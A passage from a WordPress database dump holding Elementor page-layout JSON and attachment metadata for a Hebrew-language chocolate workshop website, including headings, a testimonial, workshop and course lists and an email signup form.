\\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"50\"},\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":28},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"bold\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"Your Email\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"49cd254f\",\"elType\":\"section\",\"settings\":{\"border_border\":\"dotted\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"rgba(255,255,255,0.56)\",\"margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3f5ce056\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":40,\"_inline_size_mobile\":40},\"elements\":[{\"id\":\"6653aa2c\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":70},\"image\":{\"id\":38,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(129,40,'_elementor_version','0.4'),(130,41,'_menu_item_type','post_type'),(131,41,'_menu_item_menu_item_parent','0'),(132,41,'_menu_item_object_id','7'),(133,41,'_menu_item_object','page'),(134,41,'_menu_item_target',''),(135,41,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(136,41,'_menu_item_xfn',''),(137,41,'_menu_item_url',''),(175,46,'_edit_last','1'),(176,46,'_edit_lock','1596644735:1'),(177,46,'_wp_page_template','elementor_header_footer'),(178,47,'_menu_item_type','post_type'),(179,47,'_menu_item_menu_item_parent','0'),(180,47,'_menu_item_object_id','46'),(181,47,'_menu_item_object','page'),(182,47,'_menu_item_target',''),(183,47,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(184,47,'_menu_item_xfn',''),(185,47,'_menu_item_url',''),(187,49,'_wp_attached_file','2018/05/cropped-logoup.png'),(188,49,'_wp_attachment_context','custom-logo'),(189,49,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:250;s:6:\"height\";i:250;s:4:\"file\";s:26:\"2018/05/cropped-logoup.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"cropped-logoup-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:26:\"cropped-logoup-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(194,52,'_wp_attached_file','2018/05/cropped-logoup-1.png'),(195,52,'_wp_attachment_context','site-icon'),(196,52,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:28:\"2018/05/cropped-logoup-1.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"cropped-logoup-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"cropped-logoup-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:28:\"cropped-logoup-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:28:\"cropped-logoup-1-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:28:\"cropped-logoup-1-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:28:\"cropped-logoup-1-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:26:\"cropped-logoup-1-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(205,55,'_wp_page_template','elementor_canvas'),(206,55,'_elementor_edit_mode','builder'),(207,55,'_elementor_template_type','post'),(208,55,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",